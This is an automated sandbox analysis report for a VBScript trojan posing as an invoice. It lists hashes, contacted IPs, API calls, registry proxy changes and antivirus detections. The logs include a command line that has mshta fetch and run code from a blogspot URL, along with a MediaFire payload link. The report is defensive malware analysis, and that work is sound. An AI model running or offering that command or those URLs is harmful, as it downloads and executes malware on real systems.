Summary | ZeroBOX

lnvoice#20336 .vbs

Category Machine Started Completed
FILE s1_win7_x6402 Aug. 9, 2023, 11:15 a.m. Aug. 9, 2023, 11:18 a.m.
Size 4.6KB
Type ASCII text, with very long lines, with no line terminators
MD5 8280d77f1fe4f3ad7e067180f6cf1ad9
SHA256 d77d9d1e6a565872764d63888898c9fd1f27ae108bea1096b597ae5e9b00e14f
CRC32 7C564F44
ssdeep 24:lgPtE1wnIQHnCnp4WmnCnDdnCn2bxYA0QDkNulTmnCnumnJWWWWT:+PkQMbbxYA0duleK
Yara None matched

IP Address Status Action
104.16.54.48 Active Moloch
164.124.101.2 Active Moloch
199.91.155.98 Active Moloch
216.58.203.65 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET https://htmmaincpla.blogspot.com/atom.xml
request GET https://www.mediafire.com/file/uobbc8hga4065u7/MAINNODECPa.htm/file
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73162000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a83000
process_handle: 0xffffffff
1 0 0
cmdline "C:\Windows\System32\mshta.exe" https://htmmaincpla.blogspot.com/atom.xml
cmdline mshta https://htmmaincpla.blogspot.com/atom.xml
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: mshta
parameters: https://htmmaincpla.blogspot.com/atom.xml
filepath: mshta
1 1 0
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002dc
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
ALYac VB:Trojan.VBS.Agent.BTQ
VIPRE VB:Trojan.VBS.Agent.BTQ
ESET-NOD32 VBS/Kryptik.TV
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.VBS.Agent.BTQ
MicroWorld-eScan VB:Trojan.VBS.Agent.BTQ
Tencent Script.Trojan.Generic.Ximw
Emsisoft VB:Trojan.VBS.Agent.BTQ (B)
FireEye VB:Trojan.VBS.Agent.BTQ
GData VB:Trojan.VBS.Agent.BTQ
Arcabit VB:Trojan.VBS.Agent.BTQ
ZoneAlarm HEUR:Trojan.Script.Generic
MAX malware (ai score=82)
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002dc
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
1 0 0
parent_process wscript.exe martian_process "C:\Windows\System32\mshta.exe" https://htmmaincpla.blogspot.com/atom.xml
parent_process wscript.exe martian_process mshta https://htmmaincpla.blogspot.com/atom.xml
file C:\Windows\System32\mshta.exe